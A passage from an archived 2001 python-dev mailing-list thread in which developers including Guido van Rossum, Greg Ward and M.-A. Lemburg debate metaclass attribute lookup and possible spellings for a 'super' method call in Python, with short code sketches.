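print(hasattr(C, "describe"))  # False: the metaclass method stays hidden
print(NoLeakMeta.describe(C))  # class C (still reachable explicitly)
```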

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 12:57:42 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 12:57:42 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>  <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>

> > The most common use for these seems to be for calling
> > inherited methods, so perhaps something like
> > 
> >    inherited MyBaseClass.foo(arg, ...)
> > 
> > which would be equivalent to
> > 
> >    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> > 
> > where getmethod() is a new builtin like getattr()
> > except that it looks in the __classdict__, and 'self'
> > is really whatever the first argument of the containing
> > method was.
> 
> The second most common use is to reference class variables
> (e.g. imagine a class that keeps counters of how many instances have
> been created and deleted in C.initcount and C.delcount).  But these
> should not have to change, since they really are class attributes.
> 
> > Now that we have __future__, would such a change be contemplatable?
> > Or is it too radical to even think about?
> 
> If we can find a way to spell "super.method", we should be ready for
> the future.  I can't think of something right off the bat
> unfortunately.

Could we make

  super(self, MyBaseClass).foo(arg, ...)

behave similar to

  MyBaseClass.foo(self, arg, ...)

Wrapping this stuff in a function would probably also make it
possible to use the same pattern in existing Python versions.
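A pure-Python sketch of that helper, keeping the argument order proposed here. `pysuper` and the example classes are hypothetical. As described, the search starts at MyBaseClass itself and the result is bound to the instance. For comparison, the built-in super() that Python later gained takes its arguments the other way round, super(MyClass, self), and starts the search after MyClass.

```python
class pysuper:
    """Hypothetical helper: pysuper(self, MyBaseClass).foo(...) acts like
    MyBaseClass.foo(self, ...), searching from MyBaseClass upward."""

    def __init__(self, obj, cls):
        self._obj = obj
        self._cls = cls

    def __getattr__(self, name):
        for klass in self._cls.__mro__:
            if name in klass.__dict__:
                attr = klass.__dict__[name]
                if hasattr(attr, "__get__"):
                    # Bind to the instance, as MyBaseClass.foo(self, ...) would.
                    return attr.__get__(self._obj, type(self._obj))
                return attr
        raise AttributeError(name)


class MyBaseClass:
    def foo(self, arg):
        return "base got %r" % (arg,)

class MyClass(MyBaseClass):
    def foo(self, arg):
        return "my -> " + pysuper(self, MyBaseClass).foo(arg)

print(MyClass().foo(1))   # my -> base got 1
```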

Thomas


From thomas.heller at ion-tof.com  Wed May  2 13:12:21 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 13:12:21 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>

> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
> how metaclasses work in Smalltalk.  He should know, since he invented
> them! :-)  I include it below, with his permission.

I found this very interesting reading.

[From Jim Althoff]
> In the list below, indentation indicates class hierarchy (superclass --
> subclass)
The indentation, unfortunately, seems to be destroyed.

> 
> plain-class
> ----------------
> <none>                                         o Class
>    o Object                      isInstanceOf     o ObjectMetaClass                      isInstanceOf  MetaClass
>       o Class                    isInstanceOf        o ClassMetaClass                    isInstanceOf  MetaClass
>          o MetaClass             isInstanceOf           o MetaClassMetaClass             isInstanceOf  MetaClass
>       . . .
>       o Rectangle                isInstanceOf        o RectangleMetaClass                isInstanceOf  MetaClass
>          o SpecializedRectangle  isInstanceOf           o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

A question for Jim (this is more Smalltalk than Python related):
How does the Behavior class fit into this picture?

Thomas


From guido at digicool.com  Wed May  2 14:15:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 07:15:57 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200."
             <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com>  
            <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>

> > If we can find a way to spell "super.method", we should be ready for
> > the future.  I can't think of something right off the bat
> > unfortunately.
> 
> Could we make
> 
>   super(self, MyBaseClass).foo(arg, ...)
> 
> behave similar to
> 
>   MyBaseClass.foo(self, arg, ...)
> 
> Wrapping this stuff in a function would probably also make it
> possible to use the same pattern in existing Python versions.

Yes, I can see how to write super() using current tools (or 1.5.2
even).  The problem is that this makes super calls even more wordy
than they already are!  I can't think of anything that wouldn't
require compiler support though.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward at python.net  Wed May  2 14:57:41 2001
From: gward at python.net (Greg Ward)
Date: Wed, 2 May 2001 08:57:41 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
Message-ID: <20010502085741.B515@gerg.ca>

On 02 May 2001, Guido van Rossum said:
> Yes, I can see how to write super() using current tools (or 1.5.2
> even).  The problem is that this makes super calls even more wordy
> than they already are!  I can't think of anything that wouldn't
> require compiler support though.

I was just doing some gedanken with various ways to spell "super", and I
think my favourite is the same as Java's (as I remember it):

class MyClass (BaseClass):
    def foo (self, arg1, arg2):
         super.foo(arg1, arg2)


Since I don't know much about Python's guts, I can't say how
implementable this is, but I like the spelling.  The semantics would be
something like this (with adjustments to the reality of Python's guts):

  * 'super' is a magic object that only makes sense inside a 'def'
    inside a 'class' (at least for now; perhaps it could be generalized
    to work at class scope as well as method scope, but let's keep
    it simple)

  * super's notional __getattr__() does something like this:
    - peek at the calling stack frame and fetch the calling function
      (MyClass.foo) and the first argument to that function (self)
    - [is this possible?] ensure that calling_function is a bound
      method, and that it's bound to the self object we just plucked
      from the stack; raise a "misuse of super object" exception if not
    - walk the superclass tree starting at self.__class__.__bases__
      (ie. skip self's class), looking for an object with the name
      passed to this __getattr__() call -- 'foo'
    - when found, return it
    - if not found, raise AttributeError

The ability to peek at the calling stack frame is essential to this
scheme, in order to fetch the "current object" (self) without needing to
have it explicitly passed.  Is this as bothersome from C as it is from
Python?
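A literal transcription of the scheme into Python, using CPython's `sys._getframe()` to peek at the caller's frame. It assumes the calling method's first parameter is the instance. `_FrameSuper`, `super_` and the classes are hypothetical. The sketch works for one level of inheritance. However, because it always restarts the walk from self.__class__.__bases__, an intermediate class's method keeps finding itself, so a three-level hierarchy recurses until Python gives up.

```python
import sys

class _FrameSuper:
    """Hypothetical 'super' object whose __getattr__ inspects its caller."""

    def __getattr__(self, name):
        frame = sys._getframe(1)            # the method that evaluated super_.name
        code = frame.f_code
        if code.co_argcount == 0:
            raise TypeError("misuse of super object")
        obj = frame.f_locals[code.co_varnames[0]]   # assumed to be 'self'
        # Walk the superclass tree starting at self.__class__.__bases__.
        for base in type(obj).__bases__:
            for klass in base.__mro__:
                if name in klass.__dict__:
                    attr = klass.__dict__[name]
                    if hasattr(attr, "__get__"):
                        return attr.__get__(obj, type(obj))
                    return attr
        raise AttributeError(name)

super_ = _FrameSuper()


class A:
    def foo(self):
        return ["A"]

class B(A):
    def foo(self):
        return ["B"] + super_.foo()

class C(B):
    def foo(self):
        return ["C"] + super_.foo()

print(B().foo())   # ['B', 'A']
try:
    C().foo()
except RecursionError:
    print("C().foo() recurses: B.foo restarts the search at C's bases")
```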

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
In space, no one can hear you fart.


From mal at lemburg.com  Wed May  2 15:07:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 15:07:27 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <3AF0068F.32388C87@lemburg.com>

Greg Ward wrote:
> 
> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> ...

This doesn't work in Python since Python has multiple inheritance,
e.g. super in 

class A(B,C):
	def foo(self):
		super.foo()

is ambiguous.

I'd rather suggest adding a function for finding the basemethod
of a method. This is probably the most common task in this context.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 15:12:40 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 15:12:40 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook>

[Greg Ward]

> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)
> 
>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not
>     - walk the superclass tree starting at self.__class__.__bases__

Careful!
The search in the above context must start at MyClass.__bases__
which may not be the same as self.__class__.__bases__.

Thomas


From guido at digicool.com  Wed May  2 16:29:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:29:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400."
             <20010502085741.B515@gerg.ca> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>  
            <20010502085741.B515@gerg.ca> 
Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>

[Greg Ward, welcome back!]
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)

I'm sure that's everybody's favorite way to spell it!  It's mine too. :-)

> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)

Yes, that's about the only way it can be made to work.  The compiler
will have to (1) detect that 'super' is a free variable, and (2) make
it a local and initialize it with the proper magic.  Or, to relieve
the burden from the symbol table, we could make super a keyword, at
the cost of breaking existing code.
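For comparison, Python 3 eventually adopted a variant of the first option (PEP 3135). super stays an ordinary builtin, but when a method body refers to it the compiler gives the function a hidden __class__ cell holding the class the method was defined in. A zero-argument super() then uses that cell plus the method's first argument. Because the search starts from the defining class rather than from type(self), deeper hierarchies work. The classes below are made up for illustration.

```python
class BaseClass:
    def foo(self, arg1, arg2):
        return ("BaseClass", arg1, arg2)

class MyClass(BaseClass):
    def foo(self, arg1, arg2):
        # No explicit class or self: the compiler supplies a __class__ cell.
        return ("MyClass",) + super().foo(arg1, arg2)

class Sub(MyClass):
    def foo(self, arg1, arg2):
        return ("Sub",) + super().foo(arg1, arg2)

print(Sub().foo(1, 2))                    # ('Sub', 'MyClass', 'BaseClass', 1, 2)
print(MyClass.foo.__code__.co_freevars)   # ('__class__',)
```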

I don't think super is needed outside methods.

>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not

I don't think you can make that test, but making it a 'magic local'
as I suggested above would avoid the problem.

>     - walk the superclass tree starting at self.__class__.__bases__
>       (ie. skip self's class), looking for an object with the name
>       passed to this __getattr__() call -- 'foo'
>     - when found, return it
>     - if not found, raise AttributeError

Yup, that's the easy part. :-)

> The ability to peek at the calling stack frame is essential to this
> scheme, in order to fetch the "current object" (self) without needing to
> have it explicitly passed.  Is this as bothersome from C as it is from
> Python?

No, in C it's easy.  The problem is that there is no information in
the frame that tells you where the currently executing function was
defined -- all you have is the code object, which is
context-independent.
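To make the last point concrete, here is a small sketch in modern Python 3. That is an assumption: it is not the interpreter under discussion, and `sys._getframe` is CPython-specific. One function is installed in two unrelated classes, and both calls run with a single shared code object, so nothing reachable from the frame says which class the method was looked up in.

```python
import sys

def foo(self):
    # The running frame only knows its code object, not any class.
    return sys._getframe().f_code

class A:
    pass

class B:
    pass

# Install the very same function in two unrelated classes.
A.foo = foo
B.foo = foo

code_via_a = A().foo()
code_via_b = B().foo()

# Both calls ran the identical code object; nothing in it names A or B.
print(code_via_a is code_via_b)   # True
print(code_via_a.co_name)         # foo
```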

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 16:30:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:30:20 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200."
             <3AF0068F.32388C87@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
            <3AF0068F.32388C87@lemburg.com> 
Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com>

> This doesn't work in Python since Python has multiple inheritance,
> e.g. super in 
> 
> class A(B,C):
> 	def foo(self):
> 		super.foo()
> 
> is ambiguous.

I'm not sure what you mean.  The search is totally well-defined: first
search B for a foo method, then search C.

> I'd rather suggest adding a function for finding the basemethod
> of a method. This is probably the most common task in this context.

I've never heard of the concept of basemethod, but if I may venture a
guess, it would be the same definition as I give above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Wed May  2 15:38:42 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 2 May 2001 09:38:42 -0400 (EDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
	<200105020248.VAA30315@cj20424-a.reston1.va.home.com>
	<038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
	<200105021215.HAA31939@cj20424-a.reston1.va.home.com>
	<20010502085741.B515@gerg.ca>
	<200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <15088.3554.953359.757584@slothrop.digicool.com>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

  >> Since I don't know much about Python's guts, I can't say how
  >> implementable this is, but I like the spelling.  The semantics
  >> would be something like this (with adjustments to the reality of
  >> Python's guts):
  >>
  >> * 'super' is a magic object that only makes sense inside a 'def'
  >> inside a 'class' (at least for now; perhaps it could be
  >> generalized to work at class scope as well as method scope, but
  >> let's keep it simple)

  GvR> Yes, that's about the only way it can be made to work.  The
  GvR> compiler will have to (1) detect that 'super' is a free
  GvR> variable, and (2) make it a local and initialize it with the
  GvR> proper magic.  Or, to relieve the burden from the symbol table,
  GvR> we could make super a keyword, at the cost of breaking existing
  GvR> code.

  GvR> I don't think super is needed outside methods.

It seems helpful to clarify here, since this came up in conversation
at PythonLabs just the other day with the yield statement.

If we try to avoid keywords, we have to take the "well, I don't see
anyone assigning to this name" route.  If the compiler does not detect
any assignment to a nearly reserved word, like super, it would give
the use of that word special meaning.
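A rough illustration of that compile-time test, assuming Python 3's standard `symtable` module as a stand-in for the compiler's own symbol table. The helper name `classify` is hypothetical. For each method, it reports whether `super` is used and whether it is ever assigned.

```python
import symtable

SOURCE = """
class MyClass(BaseClass):
    def foo(self, arg1, arg2):
        super.foo(arg1, arg2)   # never assigned: could get special meaning

    def bar(self):
        super = 42              # assigned: must stay an ordinary local
        return super
"""

def classify(source, name):
    """Map each method name to (referenced, assigned) for `name`."""
    top = symtable.symtable(source, "<example>", "exec")
    result = {}
    for cls in top.get_children():
        for fn in cls.get_children():
            if isinstance(fn, symtable.Function):
                sym = fn.lookup(name)
                result[fn.get_name()] = (sym.is_referenced(), sym.is_assigned())
    return result

print(classify(SOURCE, "super"))
# {'foo': (True, False), 'bar': (True, True)}
```

A purely static check like this cannot see names that are poked into a module's globals at run time, which is exactly the weakness of the "nearly reserved word" approach.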

There are a bunch of little problems.  A module could (not necessarily
should) be designed to have a global name poked into its namespace;
this would break, because the name would already have transmogrified
from a regular variable into a special one.  The use of exec or import
star would make it impossible for the word to take on its special
meaning.

So keywords really are a lot clearer, but they have the potential to
be incompatible.

Jeremy


From fredrik at pythonware.com  Wed May  2 16:00:55 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 2 May 2001 16:00:55 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff>

guido wrote:

> > class MyClass (BaseClass):
> >     def foo (self, arg1, arg2):
> >          super.foo(arg1, arg2)
>
> I'm sure that's everybody's favorite way to spell it!

not mine.  my brain contains far too much Python 1.5.2 code
for it to accept that some variables are dynamically scoped,
while others are lexically scoped.

why not spell it out:

    self.__super__.foo(arg1, arg2)

or

    self.super.foo(arg1, arg2)

or

    super(self).foo(arg1, arg2)

> Or, to relieve the burden from the symbol table, we could make super
> a keyword, at the cost of breaking existing code.

hey, how about introducing $ as a keyword prefix for newly introduced
keywords?

    $super.foo(arg1, arg2)

(this can of course be mapped to either of my previous suggestions;
"$foo" either means "self.foo" or "foo(self)"...)

and to save a little typing, only use it for keywords that start with
an "s" (should leave us plenty of expansion room):

    $uper.foo(arg1, arg2)

otoh, if "super" is common enough to motivate introducing magic objects
into python, maybe "$" should mean "super."?

    $foo(arg1, arg2)

and while we're at it, let's introduce "@" for "self.".

gotta run -- time for my monthly reboot /F


From guido at digicool.com  Wed May  2 17:03:37 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:03:37 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200."
             <3AEFCEBD.2E5979C9@lemburg.com>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
            <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com>

[me]
> > The best rule I can think of so far is that DictType.__dict__ gives
> > the *true* set of attribute descriptors for dictionary objects, and is
> > thus similar to Smalltalk's class.methodDict that Jim describes
> > below.  DictType.foo is a shortcut that can resolve to either
> > DictType.__dict__['foo'] or to an attribute (maybe a method) of
> > DictType described in TypeType.__dict__['foo'], whichever is defined.
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.
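The rule can be modeled in a few lines of Python 3. This is a hypothetical sketch, not type_getattro() itself: plain dicts stand in for DictType.__dict__ and TypeType.__dict__, and "describes a method" is approximated as "is callable".

```python
def proposed_getattr(type_dict, metatype_dict, name):
    """Hypothetical model of the lookup rule for DictType.foo.

    type_dict     plays the role of DictType.__dict__
    metatype_dict plays the role of TypeType.__dict__
    """
    in_type = name in type_dict
    in_meta = name in metatype_dict
    if in_type and in_meta:
        # Clash: if the type's own entry describes a method, it wins...
        if callable(type_dict[name]):
            return type_dict[name]
        # ...otherwise the metatype's attribute wins.
        return metatype_dict[name]
    if in_type:
        return type_dict[name]
    if in_meta:
        return metatype_dict[name]
    raise AttributeError(name)


dict_type_dict = {"__repr__": lambda d: "{...}", "__doc__": "instance doc"}
type_type_dict = {"__repr__": lambda t: "<type 'dictionary'>",
                  "__doc__": "type doc", "__name__": "dictionary"}

# A method clash: DictType's own __repr__ wins.
print(proposed_getattr(dict_type_dict, type_type_dict, "__repr__")({}))  # {...}
# A non-method clash: TypeType's attribute wins.
print(proposed_getattr(dict_type_dict, type_type_dict, "__doc__"))       # type doc
```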

[MAL]
> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that both a dictionary object (call it d) and its type
(DictType) have a __repr__ method: repr(d) returns "d", and
repr(DictType) returns "<type 'dictionary'>".

Given the analogy with classes, where str(x) invokes x.__str__() and
x.__str__() can also be called directly, it is not unreasonable to
expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent
to x.__class__.foo(x), the two forms above should also be equivalent
to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to
derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very
pragmatic point that once I allow subclassing from DictType, such a
subclass might very well want to override __repr__ to wrap the base
class __repr__, and the conventional way to reference that (barring
the implementation of 'super') is DictType.__repr__.  Direct
invocation of an object's own __repr__ method as x.__repr__() is much
less common.  The implementation of repr(x) can do the right thing,
which is to look for x.__class__.__dict__['__repr__'].
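For comparison (hindsight, not part of this thread), modern Python 3 resolves the conflict the same way: `dict.__repr__` is the instance method, and the type's own repr is reached through the metatype. The `LoudDict` subclass is an illustrative name.

```python
d = {"a": 1}

# repr(d) consults the *type's* dictionary, as the rule above prescribes.
assert repr(d) == type(d).__dict__["__repr__"](d)

# DictType.__repr__ (spelled dict.__repr__ today) is the instance method,
# so a subclass can wrap the base class __repr__ with the usual spelling.
assert dict.__repr__(d) == "{'a': 1}"

class LoudDict(dict):
    def __repr__(self):
        return "LoudDict(" + dict.__repr__(self) + ")"

print(repr(LoudDict(a=1)))        # LoudDict({'a': 1})

# repr(DictType) goes through the metatype instead.
print(type(dict).__repr__(dict))  # <class 'dict'>
```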

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance
yet.  DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes or not.

That's exactly how I solved it: type_getattro() implements the rule
quoted at the top.

> The only catch here is that currently instances and classes have
> control of whether and how to bind found functions as methods or not.
> We should  probably change that to pass complete control over to the
> meta-class object and remove the special control flows currently found
> in instance_getattr2() and class_lookup().

Um, yeah, that's where I think this will end up causing more trouble.

Right now, if x is an instance, some attributes like x.__class__ and
x.__dict__ are special-cased in instance_getattr().  The mechanism I
propose removes the need for (most of) such special cases, and instead
allows the class to provide "descriptors" for instance attributes.
So, for example, if instances of a class C have an attribute named
foo, C.__dict__['foo'] contains the descriptor for that attribute, and
that is how the implementation decides how to interpret x.foo
(assuming x is an instance of C).  We may be able to access this same
descriptor as C.foo, but that's really only important for backwards
compatibility with the way classes work today.
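A minimal sketch of such a descriptor in Python 3, which adopted this mechanism as the descriptor protocol (`__get__`/`__set__`, introduced in Python 2.2). The class and attribute names are illustrative. `C.__dict__['foo']` holds an object that decides what `x.foo` means for instances.

```python
class LoggedAttribute:
    """Illustrative descriptor: lives in C.__dict__['foo'] and controls x.foo."""

    def __init__(self, name):
        self.name = name
        self.log = []

    def __get__(self, instance, owner):
        if instance is None:
            # Accessed on the class (C.foo): hand back the descriptor itself.
            return self
        self.log.append(("get", instance))
        return instance.__dict__[self.name]

    def __set__(self, instance, value):
        # Defining __set__ makes this a data descriptor, so it takes
        # priority over the instance's own __dict__ entry of the same name.
        self.log.append(("set", instance))
        instance.__dict__[self.name] = value


class C:
    foo = LoggedAttribute("foo")

x = C()
x.foo = 3
value = x.foo
ops = [op for op, _ in C.__dict__["foo"].log]

print(value)                         # 3
print(C.__dict__["foo"] is C.foo)    # True: C.foo is the descriptor itself
print(ops)                           # ['set', 'get']
```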

> In general, I think that meta-classes should not expose their
> attributes to the class objects they create, since this causes
> way too many problems.

I agree.

> Perhaps I'm oversimplifying things here, but I have a feeling that
> we can go a long way by actually trying to see meta-classes as
> first class members in the interpreter design and moving all the
> binding and lookup mechanisms over to this object type. The special
> casing should then take place in the meta-class rather than its
> creations.

Yes, that's where I'm heading!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:02:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:02:41 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF01381.592AE31B@lemburg.com>

Guido van Rossum wrote:
> 
> > This doesn't work in Python since Python has multiple inheritance,
> > e.g. super in
> >
> > class A(B,C):
> >       def foo(self):
> >               super.foo()
> >
> > is ambiguous.
> 
> I'm not sure what you mean.  The search is totally well-defined: first
> search B for a foo method, then search C.

I thought you were talking about an abstract super class which is
how Java uses this term. 

Rereading some of the posts, I think you are indeed referring to
the method which foo overrides -- this is what I call basemethod
(since it is implemented in one of the base classes).
 
> > I'd rather suggest adding a function for finding the basemethod
> > of a method. This is probably the most common task in this context.
> 
> I've never heard of the concept of basemethod, but if I may venture a
> guess, it would be the same definition as I give above.

The basemethod can be defined as the first method of the same name
found in the inheritance tree using the standard Python lookup
strategy (left-right, depth first) when continuing the lookup search
at the node in the inheritance tree which defines the method querying
the basemethod.
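MAL's definition can be sketched in Python 3 as follows. The helpers `classic_order` and `find_basemethod` are hypothetical and do not follow the mx.Tools signature. The walk reproduces the classic left-to-right, depth-first order; in Python 3 every class also passes through `object`, which simply appears in the walk. The `A(B, C)` example shows the mixin case: continuing the search past `B` reaches `C.foo` in the sibling branch.

```python
def classic_order(cls):
    """Left-to-right, depth-first walk over the bases (classic lookup order).

    A class reachable along several paths is listed every time it is reached.
    """
    order = [cls]
    for base in cls.__bases__:
        order.extend(classic_order(base))
    return order


def find_basemethod(obj, defclass, name):
    """Hypothetical helper: the `name` that defclass's own `name` overrides.

    Continues the classic search for `name` just past the first occurrence
    of `defclass` in the lookup order of type(obj).
    """
    order = classic_order(type(obj))
    start = order.index(defclass) + 1
    for klass in order[start:]:
        if name in vars(klass):
            return vars(klass)[name]
    raise AttributeError(name)


class B:
    def foo(self):
        return "B.foo"

class C:
    def foo(self):
        return "C.foo"

class A(B, C):
    def foo(self):
        return "A.foo"

a = A()
print(find_basemethod(a, A, "foo")(a))   # B.foo
print(find_basemethod(a, B, "foo")(a))   # C.foo  (found in the sibling branch)
```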

In other words: you let Python continue the search for the method
as if it hadn't found the occurrence calling the basemethod()
API. Hmm, still not clear enough... better let Tim jump in here
(we've had a discussion about basemethod() some months or years
ago). Tim ?

Note that there are many ways of defining what a basemethod
is, due to the ambiguities that are caused by multiple inheritance
